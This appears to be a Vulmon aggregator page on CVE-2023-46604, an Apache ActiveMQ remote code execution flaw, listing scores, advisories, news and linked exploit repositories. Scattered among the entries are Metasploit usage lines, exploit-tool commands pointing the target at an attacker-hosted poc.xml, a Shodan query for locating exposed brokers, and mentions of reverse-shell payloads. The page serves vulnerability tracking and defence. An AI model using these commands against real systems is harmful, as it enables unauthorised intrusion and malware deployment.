Vulmon Recent Vulnerabilities Product List Research Posts Trends Blog About Contact
9.8
CVSSv3

CVE-2023-46604

CVSSv4: NA | CVSSv3: 9.8 | CVSSv2: NA | VMScore: 1000 | EPSS: 0.94301 | KEV: Exploitation Reported
Published: 27/10/2023 Updated: 21/11/2024

Vulnerability Summary

This vulnerability allows remote malicious users to execute arbitrary code on affected installations of Delta Electronics InfraSuite Device Master. Authentication is not required to exploit this vulnerability. The specific flaw exists within the Apache ActiveMQ broker, which listens on TCP port 61616 by default. The issue results from the use of a vulnerable version of Apache ActiveMQ. An attacker can leverage this vulnerability to execute code in the context of the service account.

Vulnerability Trend

Vulnerable Product Search on Vulmon Subscribe to Product

apache activemq

apache activemq legacy openwire module

debian debian linux 10.0

netapp e-series santricity unified manager -

netapp e-series santricity web services proxy -

netapp santricity storage plugin -

Vendor Advisories

Red Hat: Critical: Red Hat Fuse 7.12.1 release and security update
Synopsis Critical: Red Hat Fuse 7121 release and security update Type/Severity Security Advisory: Critical Topic A minor version update (from 712 to 7121) is now available for Red Hat Fuse The purpose of this text-only errata is to inform you about the security issues fixed in this releaseRed Hat Product Security has rated this update ...
Debian CVElist Bug Report Logs: activemq: CVE-2023-46604
Debian Bug report logs - #1054909 activemq: CVE-2023-46604 Package: activemq; Maintainer for activemq is Debian Java Maintainers <pkg-java-maintainers@listsaliothdebianorg>; Source for activemq is src:activemq (PTS, buildd, popcon) Reported by: Moritz Mühlenhoff <jmm@inutilorg> Date: Sat, 28 Oct 2023 14:27:04 UT ...
Check Point Security Alerts: Apache ActiveMQ Remote Code Execution (CVE-2023-46604)
Check Point Reference: CPAI-2023-1080 Date Published: 5 Nov 2023 Severity: Critical ...
Hitachi Security Advisories: Multiple Vulnerabilities in Hitachi Ops Center Administrator
Hitachi Ops Center Administrator contains the following vulnerabilities: CVE-2023-45648, CVE-2023-46589, CVE-2023-46604 Affected products and versions are listed below Please upgrade your version to the appropriate version ...
Hitachi Security Advisories: Multiple Vulnerabilities in Hitachi Command Suite
Multiple vulnerabilities have been found in Hitachi Command Suite CVE-2015-7559, CVE-2018-11775, CVE-2019-0222, CVE-2023-46604 Affected products and versions are listed below Please upgrade your version to the appropriate version ...
McAfee Security Bulletin: Threat Profile: DarkGate
Properties Threat Severity High ...
McAfee Security Bulletin: Apache ActiveMQ Vulnerability Exploited To Drop Malware (CVE-2023-46604)
Properties Threat Severity High ...
McAfee Security Bulletin: Threat Profile: DarkGate
Properties Threat Severity High ...
McAfee Security Bulletin: Threat Profile: DarkGate
Properties Threat Severity High ...
McAfee Security Bulletin: Threat Profile: DarkGate
Properties Threat Severity High ...

ICS Advisories

https://ics-cert.us-cert.gov/advisories/9cead1a70b6666789374d28765b8d585
Critical Infrastructure Sectors: Critical Manufacturing
https://ics-cert.us-cert.gov/advisories/2581c41b2e61fef4878c60ef1aaefdf7
Critical Infrastructure Sectors: Critical Manufacturing

Exploits

Exploit DB: Apache ActiveMQ Unauthenticated Remote Code Execution
This Metasploit module exploits a deserialization vulnerability in the OpenWire transport unmarshaller in Apache ActiveMQ Affected versions include 5180 through to 5182, 5170 through to 5175, 5160 through to 5166, and all versions before 51516 ...
Exploit DB: Apache ActiveMQ Unauthenticated Remote Code Execution
This module exploits a deserialization vulnerability in the OpenWire transport unmarshaller in Apache ActiveMQ Affected versions include 5180 through to 5182, 5170 through to 5175, 5160 through to 5166, and all versions before 51516 ...

Mailing Lists

Full Disclosure: OXAS-ADV-2024-0001: OX App Suite Security Advisory
Dear subscribers, We're sharing our latest advisory with you and like to thank everyone who contributed in finding and solving those vulnerabilities Feel free to join our bug bounty programs for OX App Suite, Dovecot and PowerDNS at YesWeHack This advisory has also been published at documentationopen-xchangecom/appsuite/security/adv ...

Metasploit Modules

Apache ActiveMQ Unauthenticated Remote Code Execution

This module exploits a deserialization vulnerability in the OpenWire transport unmarshaller in Apache ActiveMQ. Affected versions include 5.18.0 through to 5.18.2, 5.17.0 through to 5.17.5, 5.16.0 through to 5.16.6, and all versions before 5.15.16.

msf > use exploit/multi/misc/apache_activemq_rce_cve_2023_46604
msf exploit(apache_activemq_rce_cve_2023_46604) > show targets
    ...targets...
msf exploit(apache_activemq_rce_cve_2023_46604) > set TARGET < target-id >
msf exploit(apache_activemq_rce_cve_2023_46604) > show options
    ...show and set options...
msf exploit(apache_activemq_rce_cve_2023_46604) > exploit

Github Repositories

https://github.com/qahta0/Saudi-CERT-API

This repository has a tool and an API for Saudi CERT alerts. Its goal is to help improve the level of cybersecurity awareness in Saudi Arabia. Using AWS Lambda, this project takes Saudi CERT's alerts, organizes them, and makes them easy to get through a public API.

Saudi Cert Lambda (Parser &amp; Public API) 🚀 Revised Goal This repository features a specialized tool and API for Saudi CERT alerts, focusing on bolstering online safety in Saudi Arabia Utilizing AWS Lambda, it efficiently gathers and organizes Saudi CERT's alerts, providing easy access through a public API In its pursuit, the project prioritizes offering the la

https://github.com/mranv/mranv

configs for my GitHub Account

Socials GitHub Stats 👷 Check out what I'm currently working on mranv/redrs - This repository is dedicated to providing effective and efficient tools for security professionals and penetration testers who want to perform security assessments and intrusion tests mranv/solitude - Solitude offers shell scripts for managing isolation

https://github.com/duck-sec/CVE-2023-46604-ActiveMQ-RCE-pseudoshell

This script leverages CVE-2023046604 (Apache ActiveMQ) to generate a pseudo shell. The vulnerability allows for remote code execution due to unsafe deserialization within the OpenWire protocol.

CVE-2023-46604 RCE Pseudoshell This script leverages CVE-2023046604 (Apache ActiveMQ) to generate a pseudo shell The vulnerability allows for remote code execution due to unsafe deserialization within the OpenWire protocol Description CVE-2023-46604 is a deserialization vulnerability that exists in Apache ActiveMQ's OpenWire protocol This flaw can be exploited by an att

https://github.com/qahta0/saudi_cert_lambda

This repository has a tool and an API for Saudi CERT alerts. Its goal is to help improve the level of cybersecurity awareness in Saudi Arabia. Using AWS Lambda, this project takes Saudi CERT's alerts, organizes them, and makes them easy to get through a public API.

Saudi Cert Lambda (Parser &amp; Public API) 🚀 Revised Goal This repository features a specialized tool and API for Saudi CERT alerts, focusing on bolstering online safety in Saudi Arabia Utilizing AWS Lambda, it efficiently gathers and organizes Saudi CERT's alerts, providing easy access through a public API In its pursuit, the project prioritizes offering the la

https://github.com/evkl1d/CVE-2023-46604

CVE-2023-46604 This repository contains an exploit script and a Proof of Concept (PoC) XML file for the CVE-2023-46604 vulnerability affecting Apache ActiveMQ The vulnerability allows for remote code execution due to unsafe deserialization practices within the OpenWire protocol Description CVE-2023-46604 is a deserialization vulnerability that exists in Apache ActiveMQ's

https://github.com/dcm2406/CVE-Research

Instructions for exploiting vulnerabilities CVE-2021-44228 and CVE-2023-46604

CVE-2023-46604 Lab This lab guides on exploiting vulnerabilities of CVE-2023-46604 Acknowledgements Apache ActiveMQ CVE-2023-46604 Environment This lab requires the installation of 2 virtual machines One Kali Linux machine version 20234 and one Ubuntu machine version 22043 LTS You can download them here: Kali Linux 20234 Ubuntu 22043 LTS VMware-workstation-1750 for

https://github.com/infokek/activemq-honeypot

ActiveMQ honeypot

activemq-honeypot Honeypot that scopes CVE-2023-46604 (Apache ActiveMQ RCE Vulnerability) and focused on getting Indicators of Compromise This honeypot can be used in any Threat Intelligence infrastructure to get attacker's IP adresses, Post-Exploitation samples and malware samples This information can be helpful to detect and prevent attacks in future Real usage exampl

https://github.com/tomasmussi-mulesoft/activemq-cve-2023-46604

Repository to exploit CVE-2023-46604 reported for ActiveMQ

Active MQ CVE-2023-46604 exploit This repository is a guide with examples on how to exploit the CVE-2023-46604 The exploit takes advantage of the usage of reflection for instantiating Exception classes through a malicious command that instead of being a valid command, it sends as the exception class a Spring class to load beans and as the string constructor parameter an URL fro

https://github.com/venkycs/cy8

Cy8 - AI-Powered Vulnerability Advisory Generation Cy8 is an innovative project that combines the power of AI with modern technologies like OpenAI, RAG (Retrieval-Augmented Generation), and langChain to simplify and accelerate the process of generating vulnerability reports Designed for security professionals, Cy8 aims to reduce the time and effort spent on researching and doc

https://github.com/dcm2406/CVELab

Instructions for exploiting vulnerabilities CVE-2021-44228 and CVE-2023-46604

CVE-2023-46604 Lab This lab guides on exploiting vulnerabilities of CVE-2023-46604 Acknowledgements Apache ActiveMQ CVE-2023-46604 Environment This lab requires the installation of 2 virtual machines One Kali Linux machine version 20234 and one Ubuntu machine version 22043 LTS You can download them here: Kali Linux 20234 Ubuntu 22043 LTS VMware-workstation-1750 for

https://github.com/Arlenhiack/ActiveMQ-RCE-Exploit

ActiveMQ RCE (CVE-2023-46604) 回显利用工具

ActiveMQ-Exploit English | 简体中文 CVE-2023-46604 ActiveMQ RCE&lt; 5183 Exploit Supports running jdk 18 and the target version automatically determines whether it is within the scope of the vulnerability Supports echo mode and built-in generation of expxml fofa query Disclaimer This tool is only used for legal testing Please make sure you are authorized for th

https://github.com/kezibei/ActiveMQExp

ActiveMQ CVE-2023-46604 61616端口利用工具 安全版本&gt;= 5183/5176/5167 java -jar ActiveMQExpjar rhost=rhost lhost=lhost gadget=gadget cmd=cmd 例如 java -jar ActiveMQExpjar rhost=127001 lhost=127001 gadget=cb19 cmd=whoami 默认 rport=61616 ldapport=1389 httpport=9998 目前支持的gadget如下 gadget=wincmd cmd=whoami //无回显 gadget=linuxcmd c

https://github.com/Abdibimantara/Outbound-Connection-OpenWire-Case-Cyberdefender

Outbound-Connection-OpenWire-Case-Cyberdefender Adanya Outbound connection dari IP public server ke arah IP public yang terindikasi sebagai bad IP Dimana Bad IP tersebut benar digunakan oleh threat actor guna mengekploitasi kerentanan yang ada pada server tersebut dengan service activemq kode CVE-2023-46604 Dari Analisa yang dilakukan oleh Tim SOC, didapatkan adanya 2 Bad IP,

https://github.com/minhangxiaohui/ActiveMQ_CVE-2023-46604

PY

ActiveMQ_CVE-2023-46604 PY实现快速构造数据流量并发包;两个gadgets类的实现都有,orgspringframeworkcontextsupportFileSystemXmlApplicationContext和orgspringframeworkcontextsupportClassPathXmlApplicationContext ,FIleSystemXml可以绕过一些ids 检测类设备

https://github.com/AkilElMoncer/ActiveMQ

Dans chaque dossier, tu trouveras une explication détaillée pour exploiter les vulnérabilités CVE suivantes : CVE 2015-5254, CVE 2016-3088, CVE 2022-41678 et CVE 2023-46604 Dans chaque dossier, tu trouveras des instructions détaillées pour scanner le réseau, identifier la version d'ActiveMQ en cours, et exploiter la vuln&ea

https://github.com/tomasmussi/activemq-cve-2023-46604

Repository to exploit CVE-2023-46604 reported for ActiveMQ

Active MQ CVE-2023-46604 exploit This repository is a guide with examples on how to exploit the CVE-2023-46604 The exploit takes advantage of the usage of reflection for instantiating Exception classes through a malicious command that instead of being a valid command, it sends as the exception class a Spring class to load beans and as the string constructor parameter an URL fro

https://github.com/vulncheck-oss/cve-2023-46604

A go-exploit for Apache ActiveMQ CVE-2023-46604

Apache ActiveMQ CVE-2023-46604 CVE-2023-46604 is a widely exploited vulnerability that appears on CISA's KEV list This go-exploit implementation can execute a reverse shell on the targets using a Nashorn payload, or download a binary to the target and execute it Compiling To build the exploit into a docker image simply: make docker

https://github.com/sule01u/CVE-2023-46604

CVE-2023-46604 ActiveMQ RCE vulnerability verification/exploitation tool

⚙️ 工具简介 (Welcome star 🌟) CVE-2023-46604 之 ActiveMQ RCE 漏洞验证/利用工具 CVE-2023-46604 ActiveMQ RCE vulnerability verification/exploitation tool 🔧 使用 # 拉取源码 git clone githubcom/sule01u/CVE-2023-46604git # 进入目录 cd CVE-2023-46604 # 将pocxml部署到http服务(Deploy on your vps) python3 -m httpserver # 发送poc python

https://github.com/SaumyajeetDas/CVE-2023-46604-RCE-Reverse-Shell-Apache-ActiveMQ

Achieving a Reverse Shell Exploit for Apache ActiveMQ (CVE_2023-46604)

CVE-2023-46604-RCE-Reverse-Shell-Apache-ActiveMQ This exploit builds upon the foundational work available at githubcom/X1cT34m (githubcom/X1r0z/ActiveMQ-RCE) We have further developed the technique to achieve a reverse shell utilizing the Metasploit Framework (githubcom/rapid7/metasploit-framework) Usage: Important: Manually change the IP Address (0

https://github.com/NKeshawarz/CVE-2023-46604-RCE

CVE-2023-46604-RCE Vulnerability A deserialization vulnerability in the OpenWire transport unmarshaller in Apache ActiveMQ Affected versions include 5180 through to 5182, 5170 through to 5175, 5160 through to 5166, and all versions before 51516 Setup Change the Values inside the POCXML as your needs (Your Command) Host the POCXML pass the POCXML URL to th

https://github.com/hackyou1432/brokerfile.php

broker

CVE-2023-46604 RCE Pseudoshell This script leverages CVE-2023046604 (Apache ActiveMQ) to generate a pseudo shell The vulnerability allows for remote code execution due to unsafe deserialization within the OpenWire protocol Description CVE-2023-46604 is a deserialization vulnerability that exists in Apache ActiveMQ's OpenWire protocol This flaw can be exploited by an att

https://github.com/ST3G4N05/ExploitScript-CVE-2023-46604

ExploitScript-CVE-2023-46604 Disclaimer This repository contains proof-of-concept code for CVE-2023-466064 and is intended strictly for educational purposes The authors and contributors do not endorse any illegal activity The information presented here is for academic, security research, and testing purposes, and for the current resolution of the machine Broker from HackTheBo

https://github.com/mrpentst/CVE-2023-46604

Exploit for CVE-2023-46604

CVE-2023-46604 Exploit for CVE-2023-46604 This tool helps to exploit this vulnerability Shodan Query to find target: product:"ActiveMQ" port:"61616" Tools Usage: for read targets from the file: python3 exploitpy -f targets -c YourVPS/pocxml --- single target: python3 exploitpy -ip IP -c YourVPS/pocxm

https://github.com/vjayant93/CVE-2023-46604-POC

POC repo for CVE-2023-46604

CVE-2023-46604-POC POC repo for CVE-2023-46604

https://github.com/Gloway17/ActiveMQ-CVE-2023-46604

ActiveMQ-CVE-2023-46604

https://github.com/pulentoski/CVE-2023-46604

El script explota una vulnerabilidad de deserialización insegura en Apache ActiveMQ (CVE-2023-46604)

Resumen Técnico del Ataque: CVE-2023-46604 El script explota una vulnerabilidad de deserialización insegura en Apache ActiveMQ (CVE-2023-46604) para lograr la ejecución remota de código en el servidor objetivo Descripción del Proceso de Explotación Objetivo de la Vulnerabilidad: La vulnerabilidad reside en el protocolo OpenWire de

https://github.com/X1r0z/ActiveMQ-RCE

ActiveMQ RCE (CVE-2023-46604) 漏洞利用工具

ActiveMQ-RCE [English Version] ActiveMQ RCE (CVE-2023-46604) 漏洞利用工具, 基于 Go 语言 一些详细的分析报告 exp10itio/2023/10/apache-activemq-版本-5183-rce-分析 attackerkbcom/topics/IHsgZDE3tS/cve-2023-46604/rapid7-analysis OpenWire 协议分析 参考官方的文档以及 Wireshark 对 OpenWire 协议进行简单分析 activemq

https://github.com/TheOffender/dock-n-pwn

A modular, dockerized pentesting environment

Dock-n-Pwn Lab Overview The Dock-n-Pwn lab is a Dockerized penetration testing environment that provides an attack machine (Parrot Security OS) and several vulnerable targets for practicing offensive security techniques The lab includes core services such as Juice Shop, WebGoat, DVWA, and Metasploitable2, along with an integrated Vulhub directory containing additional vulnerab

https://github.com/skrkcb2/CVE-2023-46604

CVE-2023-46604

https://github.com/mnbvcxz131421/CVE-2023-46604

CVE-2023-46604

CVE-2023-46604 CVE-2023-46604

https://github.com/gainfisheries/gainfisheries

Socials GitHub Stats 👷 Check out what I'm currently working on gainfisheries/solitude - Solitude offers shell scripts for managing isolation settings on macOS and Linux Enhance firewall control and system security effortlessly gainfisheries/blogs - all my blogs goes here! gainfisheries/gainfisheriesgithubio - This repository, g

https://github.com/thinkycx/activemq-rce-cve-2023-46604

activemq-rce-cve-2023-46604

README simple analysis for CVE-2023-46604 thinkycxme/2024-04-19-activemq-cve-2023-46604-analysishtml

https://github.com/mranv/honeypot.rs

CVE-2023-46604 (Apache ActiveMQ RCE Vulnerability) and focused on getting Indicators of Compromise.

honeypotrs Honeypot that scopes CVE-2023-46604 (Apache ActiveMQ RCE Vulnerability) and focused on getting Indicators of Compromise This honeypot can be used in any Threat Intelligence infrastructure to get attacker's IP adresses, Post-Exploitation samples and malware samples This information can be helpful to detect and prevent attacks in future How it works? In real c

https://github.com/Mudoleto/Broker_ApacheMQ

CVE-2023-46604 - ApacheMQ Version 5.15.5 Vulnerability Machine: Broker

Broker_ApacheMQ CVE-2023-46604 - ApacheMQ Version 5155 Vulnerability Machine: Broker

https://github.com/dcm2406/CVE-Lab

Instructions for exploiting vulnerabilities CVE-2021-44228 and CVE-2023-46604

CVE-2023-46604 Lab This lab guides on exploiting vulnerabilities of CVE-2023-46604 Acknowledgements Apache ActiveMQ CVE-2023-46604 Environment This lab requires the installation of 2 virtual machines One Kali Linux machine version 20234 and one Ubuntu machine version 22043 LTS You can download them here: Kali Linux 20234 Ubuntu 22043 LTS VMware-workstation-1750 for

https://github.com/Jereanny14/jereanny14.github.io

jereanny14

jereanny14githubio Digital-security-in-company´s About this proyect is about the cybersecurity in company´s, how ciberatacks be a problem a how we can avoid them Just as the subtitle says, we will cover these topics, like hacking examples in Costa Rica, general problems for safe datas and the use about software or malware The objetives about this proyect is make

Recent Articles

Critical Apache ActiveMQ flaw under attack by 'clumsy' ransomware crims
The Register

Topics Security Off-Prem On-Prem Software Offbeat Special Features Vendor Voice Vendor Voice Resources Over a week later and barely any patches for the 10/10 vulnerability have been applied

Security researchers have confirmed that ransomware criminals are capitalizing on a maximum-severity vulnerability in Apache ActiveMQ. Announced on October 25 and tracked as CVE-2023-46604, the insecure deserialization vulnerability allows for remote code execution (RCE) on affected versions. "Apache ActiveMQ is vulnerable to remote code execution," Apache said in its advisory. "The vulnerability may allow a remote attacker with network access to a broker to run arbitrary shell commands by manip...

Read more...
Oracle emits 603 patches, names one it wants you to worry about soon
The Register

Topics Security Off-Prem On-Prem Software Offbeat Special Features Vendor Voice Vendor Voice Resources Old flaws that keep causing trouble haunt Big Red

Oracle has delivered its regular quarterly collection of patches: 603 in total, 318 for its own products, and another 285 for Linux code it ships. Big Red’s VP of security assurance Eric Maurice singled out one patch as worthy of particular attention: The fix addresses CVE-2025-21556, a CVSS 9.9-out-of-10-rated vulnerability in Oracle’s Agile Product Lifecycle Management (PLM) Framework which allows a low-privileged attacker with network access to compromise that tool, and through it other O...

Read more...

References

CWE-502https://access.redhat.com/errata/RHSA-2023:7247https://nvd.nist.govhttps://github.com/qahta0/Saudi-CERT-APIhttps://www.first.org/epsshttps://www.cisa.gov/news-events/ics-advisories/icsa-24-130-03https://www.zerodayinitiative.com/advisories/ZDI-24-440/http://seclists.org/fulldisclosure/2024/Apr/18https://activemq.apache.org/security-advisories.data/CVE-2023-46604-announcement.txthttps://lists.debian.org/debian-lts-announce/2023/11/msg00013.htmlhttps://packetstormsecurity.com/files/175676/Apache-ActiveMQ-Unauthenticated-Remote-Code-Execution.htmlhttps://security.netapp.com/advisory/ntap-20231110-0010/https://www.openwall.com/lists/oss-security/2023/10/27/5http://seclists.org/fulldisclosure/2024/Apr/18https://activemq.apache.org/security-advisories.data/CVE-2023-46604-announcement.txthttps://lists.debian.org/debian-lts-announce/2023/11/msg00013.htmlhttps://packetstormsecurity.com/files/175676/Apache-ActiveMQ-Unauthenticated-Remote-Code-Execution.htmlhttps://security.netapp.com/advisory/ntap-20231110-0010/https://www.openwall.com/lists/oss-security/2023/10/27/5
Preferred Score:
CVSSv3
CVSSv2
CVSSv3
CVSSv4
EPSS
VMScore
Recommendations:
CVE-2025-30214logic flawslider by 10webCVE-2025-29927CVE-2025-2736firewallip based loginCVE-2025-30212estatebudCVE-2022-1804brute forcejob postingsCVE-2025-24514
Home
/
Search Results
/
CVE-2023-46604
Vulmon Logo Vulnerability Notification Service
You don’t have to wait for vulnerability scanning results
Get Started

Vulmon Search

Vulmon Search is a vulnerability search engine. It gives comprehensive vulnerability information through a very simple user interface.

About

Home Recent Vulnerabilities Product List Vendor List Research Posts Trends Blog About Contact

Products

Vulmon Search Vulmon Research Vulmon Alerts Vulmap

Connect

Twitter Reddit Linkedin Facebook